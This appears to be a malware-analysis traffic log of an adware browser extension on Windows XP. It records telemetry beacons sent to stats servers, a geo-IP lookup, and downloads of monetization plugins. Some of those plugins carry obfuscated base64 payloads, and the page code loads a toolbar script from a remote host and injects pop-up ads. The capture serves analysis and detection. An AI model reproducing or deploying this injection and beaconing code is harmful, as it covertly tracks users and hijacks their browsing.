hxxp://stats.newstatsclientcloud.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425	54.231.32.196
hxxp://stats.newstatsclientcloud.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509	54.231.32.196
hxxp://js.newstatsdemosrv.com/plugins/mins/262.js?ver=2&rnd=41	69.16.175.10
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugins/mins/337.js?ver=1&rnd=41	69.16.175.10
hxxp://js.newstatsdemosrv.com/plugins/mins/184.js?ver=11&rnd=41	69.16.175.10

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 HTTP/1.1

Host: stats.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 5YWqA/hbsAT52j7 X ANIhfz8LeZSwbzZennRSNr95qyRT5/GOxJxu15bYYT9dyR

x-amz-request-id: 0498DAA53AE4D7AA

Date: Mon, 12 Jan 2015 10:21:19 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 HTTP/1.1

Accept: */*

Host: stats.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: Ua7e9bbvbbCCT1UU bIiJuiUTlKYm66dUzVHP y9fM8Qw6DgdOMqkLlvENZ3CpV4

x-amz-request-id: 8228922C1C267E83

Date: Mon, 12 Jan 2015 10:21:25 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1

Host: stats.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: A/zmK/7hgaaXBz9PonyEz79wBldwn4ioXtD1LKmI1eMLwSl2i1b3Rd 04pDGV3wy

x-amz-request-id: 3F5834F5D7454D55

Date: Mon, 12 Jan 2015 10:21:34 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1

Host: stats.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: A3lVDGbw8R9O/TJq2nlst TkRFytz5dj55QfSuffwiB5lh79oRi5t UHQIFNIM9B

x-amz-request-id: 3DE7DD4364A2825D

Date: Mon, 12 Jan 2015 10:21:34 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1

Host: logs.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:33 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1421058093.dop006.ny2.t,1421058093.cds053.ny2.c

GIF89a.............,...........D..;..

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:17 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 39

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":38,"country_name":"CA"}HTTP/1.1 200 OK..Date: Mon, 12 Jan 2015 10:21:17 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 39..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":38,"country_name":"CA"}..

GET /plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420713929"

Last-Modified: Thu, 08 Jan 2015 10:45:29 GMT

Cache-Control: max-age=651

Content-Length: 15858

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058083.dop002.ny2.t,1421058083.cds044.ny2.c

.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/.HOST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST '/js/toolbar.js';..AFFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db.get('user_id') === null) {...if (appAPI.db.get('installation') === null){....appAPI.db.set('installation', new Date().getTime());....return;...}...else {....if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar... hasn't been 2 days yet......return;....} ...}..}*/...console.log("=======> Extension [version: " appAPI.appInfo.version "] loading...");....// Set the affiliate ID. //appAPI.db.set('affiliate_id', AFFILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJS('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.includeJS('i2v.js');....appAPI.resources.includeJS('jw_whitelist_1.js');..appAPI.resources.includeJS('jw_whitelist_2.js');..appAPI.dom.addRemoteJS('hXXp://wt.iwebar.com/js/jw_whitelist_3.js');.....var pObj = sendReport();..../** Custom injections **/..appAPI.resources.includeJS('askcom.js');..function customInjections(country) {...try {....// Ask.co

<<< skipped >>>

GET /plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420713930"

Last-Modified: Thu, 08 Jan 2015 10:45:30 GMT

Cache-Control: max-age=652

Content-Length: 17999

Content-Type: text/plain; charset=UTF-8

X-HW: 1421058083.dop002.ny2.t,1421058083.cds051.ny2.c

{.."plugins_version": 23,.."plugins_list":. [. {"id":1,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/1.js","ver":11,"name":"base","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{"id":4,"url":"hXXp://js.newstatsdemosrv.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":28,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/28.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{"id":21,"url":"http://js.newstatsdemosrv.com/plugins/mins/21.js","ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"p

<<< skipped >>>

GET /plugins/mins/356.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1418564745"

Last-Modified: Sun, 14 Dec 2014 13:45:45 GMT

Cache-Control: max-age=20

Content-Length: 407

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058083.dop002.ny2.t,1421058083.cds012.ny2.c

appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"MAN"}))();};....

GET /plugins/mins/193.js?ver=9&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:24 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1408273131"

Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT

Cache-Control: max-age=804

Content-Length: 867

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058084.dop002.ny2.t,1421058084.cds009.ny2.c

if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }....

GET /plugins/mins/288.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1404660469"

Last-Modified: Sun, 06 Jul 2014 15:27:49 GMT

Cache-Control: max-age=451

Content-Length: 551

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058083.dop002.ny2.t,1421058083.cds004.ny2.c

if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }....

GET /plugins/mins/184.js?ver=11&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:24 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420026483"

Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT

Cache-Control: max-age=205

Content-Length: 1231

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058084.dop002.ny2.t,1421058084.cds013.ny2.c

if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZjA4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0MzczZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNTU1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }..

<<< skipped >>>

GET /stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 HTTP/1.1

Accept: */*

Host: stats.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: qMg0Euses8OGBO03Gf2RtEI4hB2UE6umJ6UcUQCqMJkI7rL4hUOZpdc3VYKbg/B

x-amz-request-id: 00E59B0A66C91640

Date: Mon, 12 Jan 2015 10:21:28 GMT

Cache-Control: no-cache, must-revalidate

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Tue, 25 Feb 2014 00:10:58 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:24 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1411293488"

Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT

Cache-Control: max-age=783

Content-Length: 1075

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058084.dop005.ny2.t,1421058084.cds045.ny2.c

if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIwZjA4M2QwMDQ5NDg0MTU1NDE1NzZjMWI=', 'dkragwefft'); }....

GET /plugins/mins/350.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1417707239"

Last-Modified: Thu, 04 Dec 2014 15:33:59 GMT

Cache-Control: max-age=694

Content-Length: 1799

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058083.dop005.ny2.t,1421058083.cds012.ny2.c

if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMGUxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFiMTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOTBmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMzMjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2MjMyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0NDA0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEyZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMzMmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNjMxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMzMjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMzMwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQwNDU5MTY0NDEzMWQ0ZDA1MWIwZjE1MTcxMzBkMTcyNzE2NWIyNTNkMjYyNDM1MzkyYTNjM2IyMjNmMzAzYTM1M2IyNzI5MzEzYjIyMjUzZDQzMTUxNTFmMTcxYTAwMWYzOTBkMDExMzQ3MzUyNjJkMjAyOTI5MzEzNzNmM2UyZjJiMzEzMTI5MmYyYzMxMjQyMzM1M2EyMTM2MjMyNTNkNDMxNDA4MDUwZTFkMTcxNDM5MGQwMTEzNDczNTI2MmQyMDI5MjkzMTM3M2YzZTJmMmIzMTMwMzQzNTM1MzYzMzI4MzUyNjQ4MTMxNjBhMmIyMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMzYyNTJiMjEyOTI1NGMxODFlMDIyODFiMGYwMDRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMzYyNTJjMjQzYjNmMzUyNjQ4M2IyNDMzMjE1ODI5MjUyOTJiMjEyMTM1MjgyYjIxMzMy

<<< skipped >>>

GET /plugins/mins/337.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:24 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1417094308"

Last-Modified: Thu, 27 Nov 2014 13:18:28 GMT

Cache-Control: max-age=675

Content-Length: 407

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c

appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"TEN"}))();};....

GET /plugins/mins/91.js?ver=118&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsdemosrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:24 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1421049626"

Last-Modified: Mon, 12 Jan 2015 08:00:26 GMT

Cache-Control: max-age=50

Content-Length: 185222

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c

<<< skipped >>>

